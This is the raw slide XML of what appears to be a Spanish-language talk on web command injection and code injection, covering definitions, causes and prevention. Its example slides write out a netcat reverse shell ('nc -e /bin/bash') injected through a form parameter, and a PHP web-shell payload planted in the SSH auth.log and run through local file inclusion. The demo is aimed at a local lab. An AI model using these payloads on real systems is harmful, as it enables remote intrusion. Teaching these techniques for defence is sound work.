              <a:t>-e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4444&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Submit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resultado tenemos una conexión con el usuario www-data</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800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LFI a RCE Inyección de código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Extra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En este ejemplo vamos a utilizar LFI &amp; SSH auth.log para realizar una acción similar.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s-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/auth.log tiene que tener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read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 err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para la aplicación web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s-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asegurarse que el puerto 22 este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> o correr un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap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s-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intentar una conexión </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>via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 err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;'@127.0.0.1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1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revisar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el logs via LFI: ../auth.log y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>agregamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inyectada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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con valor de “id”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1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buscamos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el valor entre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>los</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logs. Si, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aparece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el output de “id”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>podemos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iniciar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una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conexion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reversa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill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endParaRPr lang="en-US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Computadora atacante (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4444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Browser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http://127.0.0.1:8080/dc506/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lfi-viewer.php?log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth.log&amp;cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc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>
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1 4444&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Submit</a:t>
            </a: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Técnicas básicas de Inyección de comandos e Inyección de código (Web)</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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527473" cy="431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Índex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Que son Inyección de comandos e Inyección de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>código?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como ocurren?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como prevenirlos?</a:t>
            </a:r>
          </a:p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Ejemplos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de comandos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LFI a RCE Inyección de código </a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR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rgbClr val="D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Que son Inyección de comandos e Inyección de código?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918986" cy="431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Inyección de código remoto: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consiste en inyectar código, que luego, va a ser interpretado/ejecutado por la aplicación.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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Inyección de comandos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consiste en inyectar comandos del sistema operativo atreves de una aplicación vulnerable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>owasp.org/www-community/attacks/Code_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>owasp.org/www-community/attacks/Command_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR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rgbClr val="D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como ocurre?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-CR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8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4425"/>
            <a:ext cx="8103919" cy="4312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>
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La raíz de este problema recae sobre la mala inspección y mal manejo de los datos que el usuario ingresa, ya que estos pueden ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manipulados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y hacer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que la aplicación se comporte de una manera diferente al propósito para el cual fue programada. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ejecutar la aplicación sin validar la data en un gran error. En algunos casos el administrador intenta bloquear algunas técnicas o caracteres conocidos pero talvez olvida otros huecos de seguridad, como enviar data codificada.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="2400" dirty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rgbClr val="D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como prevenirlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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1" y="1861073"/>
            <a:ext cx="8198922" cy="43158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R" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comandos </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evitar usar “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” (función que ejecuta directo al sistema operativo), mejor utilizar funciones que se ejecuten dentro de la misma aplicación </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validar todo tipo de data ingresada por usuarios (data no confiable), algunos ejemplos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Que tan largo debe ser el texto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limites numéricos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Coincidir con un patrón de expresión regular</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neutralizar meta caracteres que tienen significado en la línea de comandos del sistema operativo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Preceda cada uno de los siguientes caracteres con un "^" para "escapar" y neutralizar su significado especial para el intérprete de línea de comandos: () &lt;&gt; &amp; * ‘| =? ; [] ^ ~! . "% @ / \: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+,`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Preceda cada uno de los siguientes caracteres con una '\' para escapar y neutralizar su significado especial para el intérprete de línea de comandos: {} () &lt;&gt; &amp; * ‘| =? ; [] $ - # ~! . "% / \: +,`</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1500" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implementar “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least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 err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” (que la aplicación la corra un usuario con privilegios básicos para la operación)</a:t>
            </a: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rgbClr val="D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como prevenirlos?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2"/>
            <a:ext cx="8198922" cy="49969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R" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de código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r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Busque y bloquee caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de escape y otros símbolos especiales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>del lenguaje </a:t>
